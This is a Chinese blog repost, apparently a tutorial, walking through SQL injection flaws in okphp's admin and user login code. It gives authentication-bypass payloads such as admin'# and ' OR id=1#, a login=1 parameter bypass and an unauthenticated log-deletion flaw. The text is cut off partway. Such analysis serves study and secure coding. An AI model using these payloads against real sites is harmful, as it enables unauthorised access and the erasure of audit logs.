手工注射php学习

潘怡洋

潘怡洋

2016-01-29 13:04

手工注射php学习,手工注射php学习

转自:http://www6.blog.163.com/article/-2jc4-x8C13g.html

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/php/)

代码: 
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname); 
$password = md5($password); 
$q = "select id,group_id from $user_table where username='$username' and password='$password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中 
$username 和 $password 没过滤, 很容易就绕过。 
对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有: 

构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a 

相当于sql语句: 
select * from $user_table where username= OR 'a'='a' and password= OR 'a'='a' 

构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*) 

即: 
select * from $user_table where username='admin'#' and password='$password'" 

相当于: 
select * from $user_table where username='admin' 

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2: 

select id,group_id from $user_table where username='admin'#' and password='$password'" 

相当于: 
select id,group_id from $user_table where username='admin' 

只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id, 
我们就可以这样构造:$username=' OR id=1# 

相当于: 
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉) 

我们接着往下看代码: 
if ($row[0]) { 
// If not admin or super moderator 
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { 
$login = 0; 


else { 
$login = 1; 


// Fail to login
--- 
if (!$login) { 
write_log("Moderator login","0","password wrong"); 
echo "<scriptalert('login failed!');history.go(-1);</script"; 
exit(); 

// Access ! 

else { 
session_start(); 

呵呵~~ 最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。 


2.users/login.php注射导致绕过身份验证漏洞: 
代码: 
$md5password = md5($password); 
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$username没过滤利用同1里注释掉and password='$md5password'";就绕过啦。 


3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下) 

okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码: 

$arr = array("del_log","log_id","del_id"); 
get_r($arr); 
// 
if ($del_log) { 
省略........ 
if ($log_id) { 
foreach ($log_id as $val) { 
$q = "delete from $log_table where id='$val'"; 
$res = sql_query($q,$conn); 
if ($res) { 
$i++; 



elseif ($del_id) { 
$q = "delete from $log_table where id='$del_id'"; 
$res = sql_query($q,$conn); 

$tpl-setVariable("message","$i log deleted ok!"); 
$tpl-setVariable("action","index.php?action=list_log"); 


代码就只简单的用get_r($arr);判断的提交的参数,我

展开更多 50%)
分享

猜你喜欢

手工注射php学习

PHP
手工注射php学习

PHP学习之PHP变量

PHP
PHP学习之PHP变量

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

PHP学习之PHP表达式

PHP
PHP学习之PHP表达式

PHP基础学习笔记

PHP
PHP基础学习笔记

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

PHP学习之PHP运算符

PHP
PHP学习之PHP运算符

学习使用PHP数组

Web开发
学习使用PHP数组

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

Flash MX pro的历史面板(3)

Flash MX pro的历史面板(3)

动态加载类的原理——元数据的使用

动态加载类的原理——元数据的使用
下拉加载更多内容 ↓